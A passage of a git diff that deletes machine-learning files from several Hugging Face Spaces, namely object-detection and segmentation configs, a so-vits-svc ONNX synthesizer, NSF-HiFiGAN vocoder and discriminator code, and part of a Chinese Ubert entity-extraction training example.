mask_color=None) - return vis[:, :, ::-1] # BGR -> RGB diff --git a/spaces/Gradio-Blocks/uniformer_image_detection/configs/cascade_rcnn/cascade_mask_rcnn_x101_32x4d_fpn_20e_coco.py b/spaces/Gradio-Blocks/uniformer_image_detection/configs/cascade_rcnn/cascade_mask_rcnn_x101_32x4d_fpn_20e_coco.py deleted file mode 100644 index 0cfc7d78a79836ed06cf242f5f5c32af7f065249..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_detection/configs/cascade_rcnn/cascade_mask_rcnn_x101_32x4d_fpn_20e_coco.py +++ /dev/null @@ -1,13 +0,0 @@ -_base_ = './cascade_mask_rcnn_r50_fpn_20e_coco.py' -model = dict( - pretrained='open-mmlab://resnext101_32x4d', - backbone=dict( - type='ResNeXt', - depth=101, - groups=32, - base_width=4, - num_stages=4, - out_indices=(0, 1, 2, 3), - frozen_stages=1, - norm_cfg=dict(type='BN', requires_grad=True), - style='pytorch')) diff --git a/spaces/Gradio-Blocks/uniformer_image_segmentation/configs/psanet/psanet_r50-d8_512x512_160k_ade20k.py b/spaces/Gradio-Blocks/uniformer_image_segmentation/configs/psanet/psanet_r50-d8_512x512_160k_ade20k.py deleted file mode 100644 index 9c6364eb43e2abc95011205b569627ff9367d0e5..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_segmentation/configs/psanet/psanet_r50-d8_512x512_160k_ade20k.py +++ /dev/null @@ -1,7 +0,0 @@ -_base_ = [ - '../_base_/models/psanet_r50-d8.py', '../_base_/datasets/ade20k.py', - '../_base_/default_runtime.py', '../_base_/schedules/schedule_160k.py' -] -model = dict( - decode_head=dict(mask_size=(66, 66), num_classes=150), - auxiliary_head=dict(num_classes=150)) diff --git a/spaces/GroveStreet/GTA_SOVITS/onnxexport/model_onnx.py b/spaces/GroveStreet/GTA_SOVITS/onnxexport/model_onnx.py deleted file mode 100644 index e28bae95ec1e53aa05d06fc784ff86d55f228d60..0000000000000000000000000000000000000000 --- a/spaces/GroveStreet/GTA_SOVITS/onnxexport/model_onnx.py +++ /dev/null @@ -1,335 +0,0 @@ -import torch -from torch import nn -from torch.nn import functional as F - -import modules.attentions as attentions -import modules.commons as commons -import modules.modules as modules - -from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d -from torch.nn.utils import weight_norm, remove_weight_norm, spectral_norm - -import utils -from modules.commons import init_weights, get_padding -from vdecoder.hifigan.models import Generator -from utils import f0_to_coarse - - -class ResidualCouplingBlock(nn.Module): - def __init__(self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - n_flows=4, - gin_channels=0): - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.n_flows = n_flows - self.gin_channels = gin_channels - - self.flows = nn.ModuleList() - for i in range(n_flows): - self.flows.append( - modules.ResidualCouplingLayer(channels, hidden_channels, kernel_size, dilation_rate, n_layers, - gin_channels=gin_channels, mean_only=True)) - self.flows.append(modules.Flip()) - - def forward(self, x, x_mask, g=None, reverse=False): - if not reverse: - for flow in self.flows: - x, _ = flow(x, x_mask, g=g, reverse=reverse) - else: - for flow in reversed(self.flows): - x = flow(x, x_mask, g=g, reverse=reverse) - return x - - -class Encoder(nn.Module): - def __init__(self, - in_channels, - out_channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=0): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - - self.pre = nn.Conv1d(in_channels, hidden_channels, 1) - self.enc = modules.WN(hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=gin_channels) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, x, x_lengths, g=None): - # print(x.shape,x_lengths.shape) - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to(x.dtype) - x = self.pre(x) * x_mask - x = self.enc(x, x_mask, g=g) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + torch.randn_like(m) * torch.exp(logs)) * x_mask - return z, m, logs, x_mask - - -class TextEncoder(nn.Module): - def __init__(self, - out_channels, - hidden_channels, - kernel_size, - n_layers, - gin_channels=0, - filter_channels=None, - n_heads=None, - p_dropout=None): - super().__init__() - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.gin_channels = gin_channels - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - self.f0_emb = nn.Embedding(256, hidden_channels) - - self.enc_ = attentions.Encoder( - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout) - - def forward(self, x, x_mask, f0=None, z=None): - x = x + self.f0_emb(f0).transpose(1, 2) - x = self.enc_(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + z * torch.exp(logs)) * x_mask - return z, m, logs, x_mask - - -class DiscriminatorP(torch.nn.Module): - def __init__(self, period, kernel_size=5, stride=3, use_spectral_norm=False): - super(DiscriminatorP, self).__init__() - self.period = period - self.use_spectral_norm = use_spectral_norm - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList([ - norm_f(Conv2d(1, 32, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(32, 128, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(128, 512, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(512, 1024, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(1024, 1024, (kernel_size, 1), 1, padding=(get_padding(kernel_size, 1), 0))), - ]) - self.conv_post = norm_f(Conv2d(1024, 1, (3, 1), 1, padding=(1, 0))) - - def forward(self, x): - fmap = [] - - # 1d to 2d - b, c, t = x.shape - if t % self.period != 0: # pad first - n_pad = self.period - (t % self.period) - x = F.pad(x, (0, n_pad), "reflect") - t = t + n_pad - x = x.view(b, c, t // self.period, self.period) - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class DiscriminatorS(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(DiscriminatorS, self).__init__() - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList([ - norm_f(Conv1d(1, 16, 15, 1, padding=7)), - norm_f(Conv1d(16, 64, 41, 4, groups=4, padding=20)), - norm_f(Conv1d(64, 256, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(256, 1024, 41, 4, groups=64, padding=20)), - norm_f(Conv1d(1024, 1024, 41, 4, groups=256, padding=20)), - norm_f(Conv1d(1024, 1024, 5, 1, padding=2)), - ]) - self.conv_post = norm_f(Conv1d(1024, 1, 3, 1, padding=1)) - - def forward(self, x): - fmap = [] - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class F0Decoder(nn.Module): - def __init__(self, - out_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - spk_channels=0): - super().__init__() - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.spk_channels = spk_channels - - self.prenet = nn.Conv1d(hidden_channels, hidden_channels, 3, padding=1) - self.decoder = attentions.FFT( - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout) - self.proj = nn.Conv1d(hidden_channels, out_channels, 1) - self.f0_prenet = nn.Conv1d(1, hidden_channels, 3, padding=1) - self.cond = nn.Conv1d(spk_channels, hidden_channels, 1) - - def forward(self, x, norm_f0, x_mask, spk_emb=None): - x = torch.detach(x) - if spk_emb is not None: - x = x + self.cond(spk_emb) - x += self.f0_prenet(norm_f0) - x = self.prenet(x) * x_mask - x = self.decoder(x * x_mask, x_mask) - x = self.proj(x) * x_mask - return x - - -class SynthesizerTrn(nn.Module): - """ - Synthesizer for Training - """ - - def __init__(self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels, - ssl_dim, - n_speakers, - sampling_rate=44100, - **kwargs): - super().__init__() - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - self.ssl_dim = ssl_dim - self.emb_g = nn.Embedding(n_speakers, gin_channels) - - self.pre = nn.Conv1d(ssl_dim, hidden_channels, kernel_size=5, padding=2) - - self.enc_p = TextEncoder( - inter_channels, - hidden_channels, - filter_channels=filter_channels, - n_heads=n_heads, - n_layers=n_layers, - kernel_size=kernel_size, - p_dropout=p_dropout - ) - hps = { - "sampling_rate": sampling_rate, - "inter_channels": inter_channels, - "resblock": resblock, - "resblock_kernel_sizes": resblock_kernel_sizes, - "resblock_dilation_sizes": resblock_dilation_sizes, - "upsample_rates": upsample_rates, - "upsample_initial_channel": upsample_initial_channel, - "upsample_kernel_sizes": upsample_kernel_sizes, - "gin_channels": gin_channels, - } - self.dec = Generator(h=hps) - self.enc_q = Encoder(spec_channels, inter_channels, hidden_channels, 5, 1, 16, gin_channels=gin_channels) - self.flow = ResidualCouplingBlock(inter_channels, hidden_channels, 5, 1, 4, gin_channels=gin_channels) - self.f0_decoder = F0Decoder( - 1, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - spk_channels=gin_channels - ) - self.emb_uv = nn.Embedding(2, hidden_channels) - self.predict_f0 = False - - def forward(self, c, f0, mel2ph, uv, noise=None, g=None): - - decoder_inp = F.pad(c, [0, 0, 1, 0]) - mel2ph_ = mel2ph.unsqueeze(2).repeat([1, 1, c.shape[-1]]) - c = torch.gather(decoder_inp, 1, mel2ph_).transpose(1, 2) # [B, T, H] - - c_lengths = (torch.ones(c.size(0)) * c.size(-1)).to(c.device) - g = g.unsqueeze(0) - g = self.emb_g(g).transpose(1, 2) - x_mask = torch.unsqueeze(commons.sequence_mask(c_lengths, c.size(2)), 1).to(c.dtype) - x = self.pre(c) * x_mask + self.emb_uv(uv.long()).transpose(1, 2) - - if self.predict_f0: - lf0 = 2595. * torch.log10(1. + f0.unsqueeze(1) / 700.) / 500 - norm_lf0 = utils.normalize_f0(lf0, x_mask, uv, random_scale=False) - pred_lf0 = self.f0_decoder(x, norm_lf0, x_mask, spk_emb=g) - f0 = (700 * (torch.pow(10, pred_lf0 * 500 / 2595) - 1)).squeeze(1) - - z_p, m_p, logs_p, c_mask = self.enc_p(x, x_mask, f0=f0_to_coarse(f0), z=noise) - z = self.flow(z_p, c_mask, g=g, reverse=True) - o = self.dec(z * c_mask, g=g, f0=f0) - return o diff --git a/spaces/GroveStreet/GTA_SOVITS/vdecoder/nsf_hifigan/models.py b/spaces/GroveStreet/GTA_SOVITS/vdecoder/nsf_hifigan/models.py deleted file mode 100644 index c2c889ec2fbd215702298ba2b7c411c6f5630d80..0000000000000000000000000000000000000000 --- a/spaces/GroveStreet/GTA_SOVITS/vdecoder/nsf_hifigan/models.py +++ /dev/null @@ -1,439 +0,0 @@ -import os -import json -from .env import AttrDict -import numpy as np -import torch -import torch.nn.functional as F -import torch.nn as nn -from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d -from torch.nn.utils import weight_norm, remove_weight_norm, spectral_norm -from .utils import init_weights, get_padding - -LRELU_SLOPE = 0.1 - - -def load_model(model_path, device='cuda'): - h = load_config(model_path) - - generator = Generator(h).to(device) - - cp_dict = torch.load(model_path, map_location=device) - generator.load_state_dict(cp_dict['generator']) - generator.eval() - generator.remove_weight_norm() - del cp_dict - return generator, h - -def load_config(model_path): - config_file = os.path.join(os.path.split(model_path)[0], 'config.json') - with open(config_file) as f: - data = f.read() - - json_config = json.loads(data) - h = AttrDict(json_config) - return h - - -class ResBlock1(torch.nn.Module): - def __init__(self, h, channels, kernel_size=3, dilation=(1, 3, 5)): - super(ResBlock1, self).__init__() - self.h = h - self.convs1 = nn.ModuleList([ - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[2], - padding=get_padding(kernel_size, dilation[2]))) - ]) - self.convs1.apply(init_weights) - - self.convs2 = nn.ModuleList([ - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=1, - padding=get_padding(kernel_size, 1))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=1, - padding=get_padding(kernel_size, 1))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=1, - padding=get_padding(kernel_size, 1))) - ]) - self.convs2.apply(init_weights) - - def forward(self, x): - for c1, c2 in zip(self.convs1, self.convs2): - xt = F.leaky_relu(x, LRELU_SLOPE) - xt = c1(xt) - xt = F.leaky_relu(xt, LRELU_SLOPE) - xt = c2(xt) - x = xt + x - return x - - def remove_weight_norm(self): - for l in self.convs1: - remove_weight_norm(l) - for l in self.convs2: - remove_weight_norm(l) - - -class ResBlock2(torch.nn.Module): - def __init__(self, h, channels, kernel_size=3, dilation=(1, 3)): - super(ResBlock2, self).__init__() - self.h = h - self.convs = nn.ModuleList([ - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]))) - ]) - self.convs.apply(init_weights) - - def forward(self, x): - for c in self.convs: - xt = F.leaky_relu(x, LRELU_SLOPE) - xt = c(xt) - x = xt + x - return x - - def remove_weight_norm(self): - for l in self.convs: - remove_weight_norm(l) - - -class SineGen(torch.nn.Module): - """ Definition of sine generator - SineGen(samp_rate, harmonic_num = 0, - sine_amp = 0.1, noise_std = 0.003, - voiced_threshold = 0, - flag_for_pulse=False) - samp_rate: sampling rate in Hz - harmonic_num: number of harmonic overtones (default 0) - sine_amp: amplitude of sine-wavefrom (default 0.1) - noise_std: std of Gaussian noise (default 0.003) - voiced_thoreshold: F0 threshold for U/V classification (default 0) - flag_for_pulse: this SinGen is used inside PulseGen (default False) - Note: when flag_for_pulse is True, the first time step of a voiced - segment is always sin(np.pi) or cos(0) - """ - - def __init__(self, samp_rate, harmonic_num=0, - sine_amp=0.1, noise_std=0.003, - voiced_threshold=0): - super(SineGen, self).__init__() - self.sine_amp = sine_amp - self.noise_std = noise_std - self.harmonic_num = harmonic_num - self.dim = self.harmonic_num + 1 - self.sampling_rate = samp_rate - self.voiced_threshold = voiced_threshold - - def _f02uv(self, f0): - # generate uv signal - uv = torch.ones_like(f0) - uv = uv * (f0 > self.voiced_threshold) - return uv - - @torch.no_grad() - def forward(self, f0, upp): - """ sine_tensor, uv = forward(f0) - input F0: tensor(batchsize=1, length, dim=1) - f0 for unvoiced steps should be 0 - output sine_tensor: tensor(batchsize=1, length, dim) - output uv: tensor(batchsize=1, length, 1) - """ - f0 = f0.unsqueeze(-1) - fn = torch.multiply(f0, torch.arange(1, self.dim + 1, device=f0.device).reshape((1, 1, -1))) - rad_values = (fn / self.sampling_rate) % 1 ###%1意味着n_har的乘积无法后处理优化 - rand_ini = torch.rand(fn.shape[0], fn.shape[2], device=fn.device) - rand_ini[:, 0] = 0 - rad_values[:, 0, :] = rad_values[:, 0, :] + rand_ini - is_half = rad_values.dtype is not torch.float32 - tmp_over_one = torch.cumsum(rad_values.double(), 1) # % 1 #####%1意味着后面的cumsum无法再优化 - if is_half: - tmp_over_one = tmp_over_one.half() - else: - tmp_over_one = tmp_over_one.float() - tmp_over_one *= upp - tmp_over_one = F.interpolate( - tmp_over_one.transpose(2, 1), scale_factor=upp, - mode='linear', align_corners=True - ).transpose(2, 1) - rad_values = F.interpolate(rad_values.transpose(2, 1), scale_factor=upp, mode='nearest').transpose(2, 1) - tmp_over_one %= 1 - tmp_over_one_idx = (tmp_over_one[:, 1:, :] - tmp_over_one[:, :-1, :]) < 0 - cumsum_shift = torch.zeros_like(rad_values) - cumsum_shift[:, 1:, :] = tmp_over_one_idx * -1.0 - rad_values = rad_values.double() - cumsum_shift = cumsum_shift.double() - sine_waves = torch.sin(torch.cumsum(rad_values + cumsum_shift, dim=1) * 2 * np.pi) - if is_half: - sine_waves = sine_waves.half() - else: - sine_waves = sine_waves.float() - sine_waves = sine_waves * self.sine_amp - uv = self._f02uv(f0) - uv = F.interpolate(uv.transpose(2, 1), scale_factor=upp, mode='nearest').transpose(2, 1) - noise_amp = uv * self.noise_std + (1 - uv) * self.sine_amp / 3 - noise = noise_amp * torch.randn_like(sine_waves) - sine_waves = sine_waves * uv + noise - return sine_waves, uv, noise - - -class SourceModuleHnNSF(torch.nn.Module): - """ SourceModule for hn-nsf - SourceModule(sampling_rate, harmonic_num=0, sine_amp=0.1, - add_noise_std=0.003, voiced_threshod=0) - sampling_rate: sampling_rate in Hz - harmonic_num: number of harmonic above F0 (default: 0) - sine_amp: amplitude of sine source signal (default: 0.1) - add_noise_std: std of additive Gaussian noise (default: 0.003) - note that amplitude of noise in unvoiced is decided - by sine_amp - voiced_threshold: threhold to set U/V given F0 (default: 0) - Sine_source, noise_source = SourceModuleHnNSF(F0_sampled) - F0_sampled (batchsize, length, 1) - Sine_source (batchsize, length, 1) - noise_source (batchsize, length 1) - uv (batchsize, length, 1) - """ - - def __init__(self, sampling_rate, harmonic_num=0, sine_amp=0.1, - add_noise_std=0.003, voiced_threshod=0): - super(SourceModuleHnNSF, self).__init__() - - self.sine_amp = sine_amp - self.noise_std = add_noise_std - - # to produce sine waveforms - self.l_sin_gen = SineGen(sampling_rate, harmonic_num, - sine_amp, add_noise_std, voiced_threshod) - - # to merge source harmonics into a single excitation - self.l_linear = torch.nn.Linear(harmonic_num + 1, 1) - self.l_tanh = torch.nn.Tanh() - - def forward(self, x, upp): - sine_wavs, uv, _ = self.l_sin_gen(x, upp) - sine_merge = self.l_tanh(self.l_linear(sine_wavs)) - return sine_merge - - -class Generator(torch.nn.Module): - def __init__(self, h): - super(Generator, self).__init__() - self.h = h - self.num_kernels = len(h.resblock_kernel_sizes) - self.num_upsamples = len(h.upsample_rates) - self.m_source = SourceModuleHnNSF( - sampling_rate=h.sampling_rate, - harmonic_num=8 - ) - self.noise_convs = nn.ModuleList() - self.conv_pre = weight_norm(Conv1d(h.num_mels, h.upsample_initial_channel, 7, 1, padding=3)) - resblock = ResBlock1 if h.resblock == '1' else ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(h.upsample_rates, h.upsample_kernel_sizes)): - c_cur = h.upsample_initial_channel // (2 ** (i + 1)) - self.ups.append(weight_norm( - ConvTranspose1d(h.upsample_initial_channel // (2 ** i), h.upsample_initial_channel // (2 ** (i + 1)), - k, u, padding=(k - u) // 2))) - if i + 1 < len(h.upsample_rates): # - stride_f0 = int(np.prod(h.upsample_rates[i + 1:])) - self.noise_convs.append(Conv1d( - 1, c_cur, kernel_size=stride_f0 * 2, stride=stride_f0, padding=stride_f0 // 2)) - else: - self.noise_convs.append(Conv1d(1, c_cur, kernel_size=1)) - self.resblocks = nn.ModuleList() - ch = h.upsample_initial_channel - for i in range(len(self.ups)): - ch //= 2 - for j, (k, d) in enumerate(zip(h.resblock_kernel_sizes, h.resblock_dilation_sizes)): - self.resblocks.append(resblock(h, ch, k, d)) - - self.conv_post = weight_norm(Conv1d(ch, 1, 7, 1, padding=3)) - self.ups.apply(init_weights) - self.conv_post.apply(init_weights) - self.upp = int(np.prod(h.upsample_rates)) - - def forward(self, x, f0): - har_source = self.m_source(f0, self.upp).transpose(1, 2) - x = self.conv_pre(x) - for i in range(self.num_upsamples): - x = F.leaky_relu(x, LRELU_SLOPE) - x = self.ups[i](x) - x_source = self.noise_convs[i](har_source) - x = x + x_source - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - - return x - - def remove_weight_norm(self): - print('Removing weight norm...') - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - remove_weight_norm(self.conv_pre) - remove_weight_norm(self.conv_post) - - -class DiscriminatorP(torch.nn.Module): - def __init__(self, period, kernel_size=5, stride=3, use_spectral_norm=False): - super(DiscriminatorP, self).__init__() - self.period = period - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList([ - norm_f(Conv2d(1, 32, (kernel_size, 1), (stride, 1), padding=(get_padding(5, 1), 0))), - norm_f(Conv2d(32, 128, (kernel_size, 1), (stride, 1), padding=(get_padding(5, 1), 0))), - norm_f(Conv2d(128, 512, (kernel_size, 1), (stride, 1), padding=(get_padding(5, 1), 0))), - norm_f(Conv2d(512, 1024, (kernel_size, 1), (stride, 1), padding=(get_padding(5, 1), 0))), - norm_f(Conv2d(1024, 1024, (kernel_size, 1), 1, padding=(2, 0))), - ]) - self.conv_post = norm_f(Conv2d(1024, 1, (3, 1), 1, padding=(1, 0))) - - def forward(self, x): - fmap = [] - - # 1d to 2d - b, c, t = x.shape - if t % self.period != 0: # pad first - n_pad = self.period - (t % self.period) - x = F.pad(x, (0, n_pad), "reflect") - t = t + n_pad - x = x.view(b, c, t // self.period, self.period) - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class MultiPeriodDiscriminator(torch.nn.Module): - def __init__(self, periods=None): - super(MultiPeriodDiscriminator, self).__init__() - self.periods = periods if periods is not None else [2, 3, 5, 7, 11] - self.discriminators = nn.ModuleList() - for period in self.periods: - self.discriminators.append(DiscriminatorP(period)) - - def forward(self, y, y_hat): - y_d_rs = [] - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - y_d_rs.append(y_d_r) - fmap_rs.append(fmap_r) - y_d_gs.append(y_d_g) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class DiscriminatorS(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(DiscriminatorS, self).__init__() - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList([ - norm_f(Conv1d(1, 128, 15, 1, padding=7)), - norm_f(Conv1d(128, 128, 41, 2, groups=4, padding=20)), - norm_f(Conv1d(128, 256, 41, 2, groups=16, padding=20)), - norm_f(Conv1d(256, 512, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(512, 1024, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(1024, 1024, 41, 1, groups=16, padding=20)), - norm_f(Conv1d(1024, 1024, 5, 1, padding=2)), - ]) - self.conv_post = norm_f(Conv1d(1024, 1, 3, 1, padding=1)) - - def forward(self, x): - fmap = [] - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class MultiScaleDiscriminator(torch.nn.Module): - def __init__(self): - super(MultiScaleDiscriminator, self).__init__() - self.discriminators = nn.ModuleList([ - DiscriminatorS(use_spectral_norm=True), - DiscriminatorS(), - DiscriminatorS(), - ]) - self.meanpools = nn.ModuleList([ - AvgPool1d(4, 2, padding=2), - AvgPool1d(4, 2, padding=2) - ]) - - def forward(self, y, y_hat): - y_d_rs = [] - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - if i != 0: - y = self.meanpools[i - 1](y) - y_hat = self.meanpools[i - 1](y_hat) - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - y_d_rs.append(y_d_r) - fmap_rs.append(fmap_r) - y_d_gs.append(y_d_g) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -def feature_loss(fmap_r, fmap_g): - loss = 0 - for dr, dg in zip(fmap_r, fmap_g): - for rl, gl in zip(dr, dg): - loss += torch.mean(torch.abs(rl - gl)) - - return loss * 2 - - -def discriminator_loss(disc_real_outputs, disc_generated_outputs): - loss = 0 - r_losses = [] - g_losses = [] - for dr, dg in zip(disc_real_outputs, disc_generated_outputs): - r_loss = torch.mean((1 - dr) ** 2) - g_loss = torch.mean(dg ** 2) - loss += (r_loss + g_loss) - r_losses.append(r_loss.item()) - g_losses.append(g_loss.item()) - - return loss, r_losses, g_losses - - -def generator_loss(disc_outputs): - loss = 0 - gen_losses = [] - for dg in disc_outputs: - l = torch.mean((1 - dg) ** 2) - gen_losses.append(l) - loss += l - - return loss, gen_losses diff --git a/spaces/HaloMaster/chinesesummary/fengshen/examples/ubert/example.py b/spaces/HaloMaster/chinesesummary/fengshen/examples/ubert/example.py deleted file mode 100644 index a36f649ce85404ce36be47f639d675aa88faeaf2..0000000000000000000000000000000000000000 --- a/spaces/HaloMaster/chinesesummary/fengshen/examples/ubert/example.py +++ /dev/null @@ -1,95 +0,0 @@ -import argparse -from fengshen import UbertPiplines -import os -os.environ["CUDA_VISIBLE_DEVICES"] = '6' - - -def main(): - total_parser = argparse.ArgumentParser("TASK NAME") - total_parser = UbertPiplines.piplines_args(total_parser) - args = total_parser.parse_args() - - # 设置一些训练要使用到的参数 - args.pretrained_model_path = 'IDEA-CCNL/Erlangshen-Ubert-110M-Chinese' #预训练模型的路径,我们提供的预训练模型存放在HuggingFace上 - args.default_root_dir = './' #默认主路径,用来放日志、tensorboard等 - args.max_epochs = 5 - args.gpus = 1 - args.batch_size = 1 - - # 只需要将数据处理成为下面数据的 json 样式就可以一键训练和预测,下面只是提供了一条示例样本 - train_data = [ - { - "task_type": "抽取任务", - "subtask_type": "实体识别", - "text": "彭小军认为,国内银行现在走的是台湾的发卡模式,先通过跑马圈地再在圈的地里面选择客户,", - "choices": [ - {"entity_type": "地址", "label": 0, "entity_list": [ - {"entity_name": "台湾", "entity_type": "地址", "entity_idx": [[15, 16]]}]}, - {"entity_type": "书名", "label": 0, "entity_list": []}, - {"entity_type": "公司", "label": 0, "entity_list": []}, - {"entity_type": "游戏", "label": 0, "entity_list": []}, - {"entity_type": "政府机构", "label": 0, "entity_list": []}, - {"entity_type": "电影名称", "label": 0, "entity_list": []}, - {"entity_type": "人物姓名", "label": 0, "entity_list": [ - {"entity_name": "彭小军", "entity_type": "人物姓名", "entity_idx": [[0, 2]]}]}, - {"entity_type": "组织机构", "label": 0, "entity_list": []}, - {"entity_type": "岗位职位", "label": 0, "entity_list": []}, - {"entity_type": "旅游景点", "label": 0, "entity_list": []} - ], - "id": 0} - ] - dev_data = [ - { - "task_type": "抽取任务", - "subtask_type": "实体识别", - "text": "就天涯网推出彩票服务频道是否是业内人士所谓的打政策“擦边球”,记者近日对此事求证彩票监管部门。", - "choices": [ - {"entity_type": "地址", "label": 0, "entity_list": []}, - {"entity_type": "书名", "label": 0, "entity_list": []}, - {"entity_type": "公司", "label": 0, "entity_list": [ - {"entity_name": "天涯网", "entity_type": "公司", "entity_idx": [[1, 3]]}]}, - {"entity_type": "游戏", "label": 0, "entity_list": []}, - {"entity_type": "政府机构", "label": 0, "entity_list": []}, - {"entity_type": "电影名称", "label": 0, "entity_list": []}, - {"entity_type": "人物姓名", "label": 0, "entity_list": []}, - {"entity_type": "组织机构", "label": 0, "entity_list": [ - {"entity_name": "彩票监管部门", "entity_type": "组织机构", "entity_idx": [[40, 45]]}]}, - {"entity_type": "岗位职位", "label": 0, "entity_list": [ - {"entity_name": "记者", "entity_type": "岗位职位", "entity_idx": [[31, 32]]}]}, - {"entity_type": "旅游景点", "label": 0, "entity_list": []} - ], - - "id": 0} - - ] - test_data = [ - { - "task_type": "抽取任务", - "subtask_type": "实体识别", - "text": "这也让很多业主据此认为,雅清苑是政府公务员挤对了国家的经适房政策。", - "choices": [ - {"entity_type": "地址", "label": 0, "entity_list": [ - {"entity_name": "雅清苑", "entity_type": "地址", "entity_idx": [[12, 14]]}]}, - {"entity_type": "书名", "label": 0, "entity_list": []}, - {"entity_type": "公司", "label": 0, "entity_list": []}, - {"entity_type": "游戏", "label": 0, "entity_list": []}, - {"entity_type": "政府机构", "label": 0, "entity_list": []}, - {"entity_type": "电影名称", "label": 0, "entity_list": []}, - {"entity_type": "人物姓名", "label": 0, "entity_list": []}, - {"entity_type": "组织机构", "label": 0, 